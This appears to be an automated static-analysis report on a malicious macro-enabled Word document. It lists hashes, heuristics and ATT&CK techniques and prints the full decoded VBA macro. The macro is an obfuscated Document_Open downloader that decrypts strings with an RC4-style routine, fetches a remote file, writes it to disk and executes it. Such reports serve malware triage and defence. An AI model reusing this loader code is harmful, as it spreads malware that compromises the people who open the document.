Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ec2d0f2f74bdc327…

MALICIOUS

Office (OOXML)

31.8 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-10-03
MD5: d9a13875b5a5a80036e54c98514b6c50 SHA-1: 30bf35b9961cdf818a7fe269e6bf045ba75e3666 SHA-256: ec2d0f2f74bdc32761a2b0aa4f7f14f27665ff496ccfba6cf4882e504008c51a
400 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Office document containing obfuscated VBA macros designed to execute automatically upon opening, as indicated by the 'Obfuscated auto-exec VBA loader' and 'Document_Open macro' heuristics. The document body presents a lure to "enable editing and content," a common tactic to bypass macro security. The VBA code likely downloads and executes a second-stage payload, though the exact mechanism is obfuscated. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further confirms its malicious nature.

Heuristics 12

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    GetObject 49, 9
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set BMpyNI4 = CreateObject(B0trB4VkXGxG(Chr(247) + Chr(219) + Chr(136) + Chr(232) + Chr(237) + Chr(188) + Chr(185) + Chr(170) + Chr(77) + Chr(246) + Chr(177) + Chr(250) + Chr(127) + Chr(151) + Chr(47) + Chr(56) + Chr(67), "U0P1fWvSZJ9dvGLm"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject 49, 9
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName MD85JoQg8QZ, 57, VbMethod, 58, 55, 64
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    JPBBYW4KHxDr2 = Environ(B0trB4VkXGxG(Chr(22) + Chr(2) + Chr(199) + Chr(135) + Chr(40) + Chr(42) + Chr(119), "IAMK9NVEQa49wR")) & "\" & OEDYrNLx4 & B0trB4VkXGxG(Chr(63) + Chr(147) + Chr(59) + Chr(226), "Xq9o06gvtPI")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12235 bytes
SHA-256: a45f2e5bd918b61073d0921991e4141d84b4dfac4ec92a0ba01ac92b6403bb44
Detection
ClamAV: No threats found
Obfuscation or payload: likely
94 of 165 identifiers look randomly generated (e.g. 'PM9kVHgUMJgVQAdft8k') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub PhfAo8J6jLCy(KdQ3zvNvXRFDJT As Long)
Dim SLE5zn1 As Long, KF3NJtOp As Long
SLE5zn1 = 9
KF3NJtOp = 55
If SLE5zn1 + KF3NJtOp > 2 Then
KF3NJtOp = SLE5zn1 + 89
Else
MsgBox 13
End If
Dim WSSRRiYpY8a As Long
Dim P8QIByQ2ympsU As Long, FJN As Long
P8QIByQ2ympsU = 1
FJN = 81
If P8QIByQ2ympsU + FJN > 2 Then
FJN = P8QIByQ2ympsU + 86
Else
MsgBox 70
End If
WSSRRiYpY8a = Timer + KdQ3zvNvXRFDJT
Do While Timer < WSSRRiYpY8a
DoEvents
Loop
Dim INJtOp37NFn0 As Long, KLvWfxW As Long
INJtOp37NFn0 = 95
KLvWfxW = 97
If INJtOp37NFn0 + KLvWfxW > 2 Then
KLvWfxW = INJtOp37NFn0 + 38
Else
MsgBox 41
End If
End Sub
Function B0trB4VkXGxG(ByVal QcPhWQX As String, ByVal UcWcHmMJanno As String) As String
Dim ItcKSFRO As Long, NgUP As Long
ItcKSFRO = 78
NgUP = 1
If ItcKSFRO + NgUP > 2 Then
NgUP = ItcKSFRO + 7
Else
MsgBox 35
End If
On Error Resume Next
Dim U7qseUfTf9 As Long, PM9kVHgUMJgVQAdft8k As Long
U7qseUfTf9 = 15
PM9kVHgUMJgVQAdft8k = 37
If U7qseUfTf9 + PM9kVHgUMJgVQAdft8k > 2 Then
PM9kVHgUMJgVQAdft8k = U7qseUfTf9 + 70
Else
MsgBox 98
End If
Dim QQ0GuOd01c(0 To 255) As Integer, EvjXPfT As Long, Mwp8E98bu3LV As Long, X94xNrXn76 As Long, Twks() As Byte, JrcBICw6QG() As Byte, BsGuFOg1ix As Byte
Dim KjWYNYX0DWh02 As Long, HVBgTKMxmsW As Long
KjWYNYX0DWh02 = 2
HVBgTKMxmsW = 51
If KjWYNYX0DWh02 + HVBgTKMxmsW > 2 Then
HVBgTKMxmsW = KjWYNYX0DWh02 + 28
Else
MsgBox 23
End If
Twks() = StrConv(UcWcHmMJanno, vbFromUnicode)
Dim GR8YHtb2SoR7K As Long, VuNA6Jr6NZ As Long
GR8YHtb2SoR7K = 47
VuNA6Jr6NZ = 65
If GR8YHtb2SoR7K + VuNA6Jr6NZ > 2 Then
VuNA6Jr6NZ = GR8YHtb2SoR7K + 11
Else
MsgBox 74
End If
For EvjXPfT = 0 To 255
QQ0GuOd01c(EvjXPfT) = EvjXPfT
Next EvjXPfT
EvjXPfT = 0
Mwp8E98bu3LV = 0
X94xNrXn76 = 0
For EvjXPfT = 0 To 255
Mwp8E98bu3LV = (Mwp8E98bu3LV + QQ0GuOd01c(EvjXPfT) + Twks(EvjXPfT Mod Len(UcWcHmMJanno))) Mod 256
BsGuFOg1ix = QQ0GuOd01c(EvjXPfT)
QQ0GuOd01c(EvjXPfT) = QQ0GuOd01c(Mwp8E98bu3LV)
QQ0GuOd01c(Mwp8E98bu3LV) = BsGuFOg1ix
Next EvjXPfT
EvjXPfT = 0
Mwp8E98bu3LV = 0
X94xNrXn76 = 0
JrcBICw6QG() = StrConv(QcPhWQX, vbFromUnicode)
For EvjXPfT = 0 To Len(QcPhWQX)
Mwp8E98bu3LV = (Mwp8E98bu3LV + 1) Mod 256
X94xNrXn76 = (X94xNrXn76 + QQ0GuOd01c(Mwp8E98bu3LV)) Mod 256
BsGuFOg1ix = QQ0GuOd01c(Mwp8E98bu3LV)
QQ0GuOd01c(Mwp8E98bu3LV) = QQ0GuOd01c(X94xNrXn76)
QQ0GuOd01c(X94xNrXn76) = BsGuFOg1ix
JrcBICw6QG(EvjXPfT) = JrcBICw6QG(EvjXPfT) Xor (QQ0GuOd01c((QQ0GuOd01c(Mwp8E98bu3LV) + QQ0GuOd01c(X94xNrXn76)) Mod 256))
Next EvjXPfT
Dim Ihu0yw3bw As Long, Nf1jxBwqygWnZd As Long
Ihu0yw3bw = 52
Nf1jxBwqygWnZd = 53
If Ihu0yw3bw + Nf1jxBwqygWnZd > 2 Then
Nf1jxBwqygWnZd = Ihu0yw3bw + 49
Else
MsgBox 59
End If
B0trB4VkXGxG = StrConv(JrcBICw6QG, vbUnicode)
Dim R2vccmZMn2 As Long, K5P1VaW5PT As Long
R2vccmZMn2 = 70
K5P1VaW5PT = 95
If R2vccmZMn2 + K5P1VaW5PT > 2 Then
K5P1VaW5PT = R2vccmZMn2 + 93
Else
MsgBox 25
End If
End Function
Function OEDYrNLx4() As String
Dim S8mHrayf7 As Long, VSejaxwxNS8Z As Long
S8mHrayf7 = 69
VSejaxwxNS8Z = 70
If S8mHrayf7 + VSejaxwxNS8Z > 2 Then
VSejaxwxNS8Z = S8mHrayf7 + 67
Else
MsgBox 77
End If
Dim WGBcAfgJj() As Byte, MHbyRIEHDh() As Byte, RGp7Hy5lWQsukt As Long, W6rV5 As Long, H7aA As String, EDWfxW As String, Ia8cjtQXzQWv As Long
Dim VeN0I4CB6 As Long, UEPoGir30IBpQ3 As Long
VeN0I4CB6 = 93
UEPoGir30IBpQ3 = 25
If VeN0I4CB6 + UEPoGir30IBpQ3 > 2 Then
UEPoGir30IBpQ3 = VeN0I4CB6 + 32
Else
MsgBox 37
End If
Ia8cjtQXzQWv = 0
Dim Nai As Long, RHoEpdpKSfxGtq As Long
Nai = 21
RHoEpdpKSfxGtq = 17
If Nai + RHoEpdpKSfxGtq > 2 Then
RHoEpdpKSfxGtq = Nai + 82
Else
MsgBox 60
End If
T6TccoSl2MfJO:
Dim H1iOzJB As Long, TsUkOIeu5vniF As Long
H1iOzJB = 59
TsUkOIeu5vniF = 54
If H1iOzJB + TsUkOIeu5vniF > 2 Then
TsUkOIeu5vniF = H1iOzJB + 97
Else
MsgBox 40
End If
Randomize
EDWfxW = Int(30 * Rnd)
If EDWfxW < 4 Then GoTo T6TccoSl2MfJO
Ia8cjtQXzQWv = EDWfxW
If Ia8cjtQXzQWv > 0& Then
Dim UGwNOQ As Long, Bp0LVOllEfC As Long
UGwNOQ = 73
Bp0LVOllEfC = 61
If UGwNOQ + Bp0LVOllEfC > 2 Then
Bp0LVOllEfC = UGwNOQ + 96
Else
MsgBox 90
End If
H7aA = B0trB4VkXGxG(Chr(150) + Chr(34) + Chr(224) + Chr(39) + Chr(108) + Chr(235) + Chr(147) + Chr(253) + Chr(191) + Chr(192), "XKPc2Kmbzzx")
Randomize
WGBcAfgJj = H7aA
RGp7Hy5lWQsukt = Len(H7aA) - 1&
Ia8cjtQXzQWv = (Ia8cjtQXzQWv * 2&) - 1&
ReDim MHbyRIEHDh(Ia8cjtQXzQWv) As Byte
Dim QH0CSOplDVMYqmFx As Long, RqCJ8AlK3TMvP As Long
QH0CSOplDVMYqmFx = 42
RqCJ8AlK3TMvP = 80
If QH0CSOplDVMYqmFx + RqCJ8AlK3TMvP > 2 Then
RqCJ8AlK3TMvP = QH0CSOplDVMYqmFx + 91
Else
MsgBox 7
End If
For W6rV5 = 0& To Ia8cjtQXzQWv Step 2&
MHbyRIEHDh(W6rV5) = WGBcAfgJj(CLng(RGp7Hy5lWQsukt * Rnd) * 2&)
Next
Dim FnNn5n1 As Long, HoX As Long
FnNn5n1 = 7
HoX = 14
If FnNn5n1 + HoX > 2 Then
HoX = FnNn5n1 + 64
Else
MsgBox 15
End If
End If
Dim K0MXThZkclEVOag As Long, I9aR4WmF As Long
K0MXThZkclEVOag = 91
I9aR4WmF = 29
If K0MXThZkclEVOag + I9aR4WmF > 2 Then
I9aR4WmF = K0MXThZkclEVOag + 45
Else
MsgBox 24
End If
OEDYrNLx4 = MHbyRIEHDh
Dim GPszXugzdzibRR3oS As Long, ETnyD6DCi As Long
GPszXugzdzibRR3oS = 61
ETnyD6DCi = 73
If GPszXugzdzibRR3oS + ETnyD6DCi > 2 Then
ETnyD6DCi = GPszXugzdzibRR3oS + 65
Else
MsgBox 87
End If
End Function
Sub Document_Open()
Dim QOgE1WWUM As Long, UkO79sC5qx As Long
QOgE1WWUM = 97
UkO79sC5qx = 65
If QOgE1WWUM + UkO79sC5qx > 2 Then
UkO79sC5qx = QOgE1WWUM + 9
Else
MsgBox 77
End If
Dim GpFp1Ewk As Long, Owda8x31kXR As Long, HTQHHox44EgB1 As Long
Dim JNNGR8IDe As Long, XsCRyrDoQQi As Long
JNNGR8IDe = 92
XsCRyrDoQQi = 81
If JNNGR8IDe + XsCRyrDoQQi > 2 Then
XsCRyrDoQQi = JNNGR8IDe + 61
Else
MsgBox 22
End If
GpFp1Ewk = 965118924: Owda8x31kXR = 0: HTQHHox44EgB1 = 0
Dim UxCFkT7MzjkO As Long, Hh8qe As Long
UxCFkT7MzjkO = 24
Hh8qe = 85
If UxCFkT7MzjkO + Hh8qe > 2 Then
Hh8qe = UxCFkT7MzjkO + 76
Else
MsgBox 77
End If
For Owda8x31kXR = 1 To GpFp1Ewk
HTQHHox44EgB1 = HTQHHox44EgB1 + 1
Next Owda8x31kXR
Dim I5ZBK91vP As Long, PpqBcrla9KqU As Long
I5ZBK91vP = 66
PpqBcrla9KqU = 60
If I5ZBK91vP + PpqBcrla9KqU > 2 Then
PpqBcrla9KqU = I5ZBK91vP + 4
Else
MsgBox 46
End If
If HTQHHox44EgB1 = GpFp1Ewk Then
Dim CLdsihkKGe4w5p As Long, AqUL As Long
CLdsihkKGe4w5p = 86
AqUL = 97
If CLdsihkKGe4w5p + AqUL > 2 Then
AqUL = CLdsihkKGe4w5p + 13
Else
MsgBox 92
End If
UA6bn
Dim Itrtc1lhg As Long, QCHoa5NYXO8HbVh As Long
Itrtc1lhg = 9
QCHoa5NYXO8HbVh = 6
If Itrtc1lhg + QCHoa5NYXO8HbVh > 2 Then
QCHoa5NYXO8HbVh = Itrtc1lhg + 15
Else
MsgBox 86
End If
Else
Dim VfcH12uNwqX252 As Long, DBX7egPflTwGqJNH0 As Long
VfcH12uNwqX252 = 44
DBX7egPflTwGqJNH0 = 59
If VfcH12uNwqX252 + DBX7egPflTwGqJNH0 > 2 Then
DBX7egPflTwGqJNH0 = VfcH12uNwqX252 + 28
Else
MsgBox 20
End If
Fhs8RtJyhYQ50
Dim US72HDJWta2 As Long, PM8r4wl5bFa7TX9LN As Long
US72HDJWta2 = 15
PM8r4wl5bFa7TX9LN = 38
If US72HDJWta2 + PM8r4wl5bFa7TX9LN > 2 Then
PM8r4wl5bFa7TX9LN = US72HDJWta2 + 70
Else
MsgBox 72
End If
End If
Dim UclAkFN As Long, OAPXaKx6icp As Long
UclAkFN = 59
OAPXaKx6icp = 52
If UclAkFN + OAPXaKx6icp > 2 Then
OAPXaKx6icp = UclAkFN + 74
Else
MsgBox 7
End If
End Sub
Sub Fhs8RtJyhYQ50()
Dim PjiomtPTovh As Long, YikyzeVrA As Long
PjiomtPTovh = 65
YikyzeVrA = 88
If PjiomtPTovh + YikyzeVrA > 2 Then
YikyzeVrA = PjiomtPTovh + 65
Else
MsgBox 60
End If
IPmt 11, 26, 6, 66
Beep
CallByName MD85JoQg8QZ, 57, VbMethod, 58, 55, 64
IsDate 36
NPer 49, 63, 94
If Abs(46) = 45 Then DYyK5M5dkFN = 7556
GetAllSettings 61, 45
WeekdayName 93
GetObject 49, 9
Sqr 5
DatePart "H31JEn54R", 69
Reset
Hour 48
FXtvYAmkp = EOF(87)
HDtwS8vsvCi459MQ = QBColor(68)
Err.Raise 51
TimeValue 77
Randomize
Weekday 97
Rnd
Atn 64
DDB 63, 39, 39, 91
LoadPicture 8, 32, 86, 24, 84
Rate 31, 65, 88
Second 65
App.LogEvent "HFkdiP5Wi7b"
Ib1SHn4XsKWY75 = Fix(60)
L7wIGGCp8M6 = UCase(49)
IsError 84
LOF 78
Dim LLsg0ybpp3B03mem As Long, OPLvgr3Np As Long
LLsg0ybpp3B03mem = 36
OPLvgr3Np = 97
If LLsg0ybpp3B03mem + OPLvgr3Np > 2 Then
OPLvgr3Np = LLsg0ybpp3B03mem + 15
Else
MsgBox 16
End If
End Sub
Sub UA6bn()
Dim BrO48zDd As Long, VUiJsZxQOl As Long
BrO48zDd = 44
VUiJsZxQOl = 72
If BrO48zDd + VUiJsZxQOl > 2 Then
VUiJsZxQOl = BrO48zDd + 14
Else
MsgBox 17
End If
Dim JPBBYW4KHxDr2 As String, BMpyNI4 As Object, Lo9NTXBQ4 As Integer
Dim QUoIwP2g0V As Long, HVS0pylKRpugG0g As Long
QUoIwP2g0V = 36
HVS0pylKRpugG0g = 50
If QUoIwP2g0V + HVS0pylKRpugG0g > 2 Then
HVS0pylKRpugG0g = QUoIwP2g0V + 53
Else
MsgBox 71
End If
JPBBYW4KHxDr2 = Environ(B0trB4VkXGxG(Chr(22) + Chr(2) + Chr(199) + Chr(135) + Chr(40) + Chr(42) + Chr(119), "IAMK9NVEQa49wR")) & "\" & OEDYrNLx4 & B0trB4VkXGxG(Chr(63) + Chr(147) + Chr(59) + Chr(226), "Xq9o06gvtPI")
Dim YXBXYsAwrnZ As Long, B87MAcD0BcLEt As Long
YXBXYsAwrnZ = 44
B87MAcD0BcLEt = 1
If YXBXYsAwrnZ + B87MAcD0BcLEt > 2 Then
B87MAcD0BcLEt = YXBXYsAwrnZ + 30
Else
MsgBox 66
End If
Set BMpyNI4 = CreateObject(B0trB4VkXGxG(Chr(247) + Chr(219) + Chr(136) + Chr(232) + Chr(237) + Chr(188) + Chr(185) + Chr(170) + Chr(77) + Chr(246) + Chr(177) + Chr(250) + Chr(127) + Chr(151) + Chr(47) + Chr(56) + Chr(67), "U0P1fWvSZJ9dvGLm"))
Dim OBOdDklYSCj As Long, LlKRpugG0gHE7F As Long
OBOdDklYSCj = 7
LlKRpugG0gHE7F = 63
If OBOdDklYSCj + LlKRpugG0gHE7F > 2 Then
LlKRpugG0gHE7F = OBOdDklYSCj + 67
Else
MsgBox 30
End If
BMpyNI4.Open B0trB4VkXGxG(Chr(81) + Chr(206) + Chr(231), "QkYZfa7FV"), B0trB4VkXGxG(Chr(31) + Chr(70) + Chr(102) + Chr(219) + Chr(30) + Chr(89) + Chr(24) + Chr(55) + Chr(170) + Chr(119) + Chr(83) + Chr(146) + Chr(197) + Chr(34) + Chr(190) + Chr(108) + Chr(229) + Chr(15) + Chr(231) + Chr(101) + Chr(34) + Chr(20) + Chr(39) + Chr(41) + Chr(187) + Chr(120) + Chr(206), "HZDYuCt8eoRGHcet"), False
Dim In3yYM8 As Long, SAWmkXG792Ghvo As Long
In3yYM8 = 74
SAWmkXG792Ghvo = 82
If In3yYM8 + SAWmkXG792Ghvo > 2 Then
SAWmkXG792Ghvo = In3yYM8 + 10
Else
MsgBox 29
End If
BMpyNI4.setRequestHeader B0trB4VkXGxG(Chr(169) + Chr(226) + Chr(199) + Chr(5) + Chr(96) + Chr(185) + Chr(245) + Chr(77) + Chr(12) + Chr(247), "MmA85Cr3xXuZh"), B0trB4VkXGxG(Chr(145) + Chr(17) + Chr(71) + Chr(185) + Chr(56) + Chr(89) + Chr(191) + Chr(21) + Chr(13) + Chr(79) + Chr(159), "QYpGByNkm")
BMpyNI4.send
If BMpyNI4.readyState = 4 And BMpyNI4.Status = 200 Then
Dim Lrm49lJe9lb As Long, NAcl3TwRj As Long
Lrm49lJe9lb = 18
NAcl3TwRj = 77
If Lrm49lJe9lb + NAcl3TwRj > 2 Then
NAcl3TwRj = Lrm49lJe9lb + 73
Else
MsgBox 38
End If
Lo9NTXBQ4 = FreeFile
Open JPBBYW4KHxDr2 For Binary Access Write Lock Write As #Lo9NTXBQ4
Put #Lo9NTXBQ4, , B0trB4VkXGxG(StrConv(BMpyNI4.ResponseBody, vbUnicode), B0trB4VkXGxG(Chr(185) + Chr(240) + Chr(32) + Chr(104) + Chr(216) + Chr(9) + Chr(21) + Chr(233) + Chr(157), "IJG7bN8UifENI8eEd"))
Close #Lo9NTXBQ4
Dim OongUnLSE4 As Long, GTajoCWrlOp As Long
OongUnLSE4 = 32
GTajoCWrlOp = 8
If OongUnLSE4 + GTajoCWrlOp > 2 Then
GTajoCWrlOp = OongUnLSE4 + 8
Else
MsgBox 60
End If
PhfAo8J6jLCy 1
Dim PB8ucaoRXU26x As Long, DFFrvzEX90OQv As Long
PB8ucaoRXU26x = 70
DFFrvzEX90OQv = 44
If PB8ucaoRXU26x + DFFrvzEX90OQv > 2 Then
DFFrvzEX90OQv = PB8ucaoRXU26x + 51
Else
MsgBox 2
End If
CreateObject(B0trB4VkXGxG(Chr(244) + Chr(104) + Chr(1) + Chr(144) + Chr(173) + Chr(217) + Chr(195) + Chr(123) + Chr(103) + Chr(10) + Chr(82) + Chr(100) + Chr(101), "JpZYe7cvFKW")).exec """" & JPBBYW4KHxDr2 & """"
Dim VYnfQC As Long, DRyBPb2W4jV As Long
VYnfQC = 47
DRyBPb2W4jV = 14
If VYnfQC + DRyBPb2W4jV > 2 Then
DRyBPb2W4jV = VYnfQC + 14
Else
MsgBox 88
End If
End If
Dim P5HFNmPRBKCD As Long, QIqF7fPZlp As Long
P5HFNmPRBKCD = 68
QIqF7fPZlp = 77
If P5HFNmPRBKCD + QIqF7fPZlp > 2 Then
QIqF7fPZlp = P5HFNmPRBKCD + 49
Else
MsgBox 36
End If
Set BMpyNI4 = Nothing
Dim YR4AteuC2b As Long, QTisL01PaeZLMQLxu As Long
YR4AteuC2b = 8
QTisL01PaeZLMQLxu = 5
If YR4AteuC2b + QTisL01PaeZLMQLxu > 2 Then
QTisL01PaeZLMQLxu = YR4AteuC2b + 15
Else
MsgBox 85
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: b8bc1fed05b1ae58b85ebaa7c925dfe8e6a86bb22e0ef86edd06663111b0f3bb
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.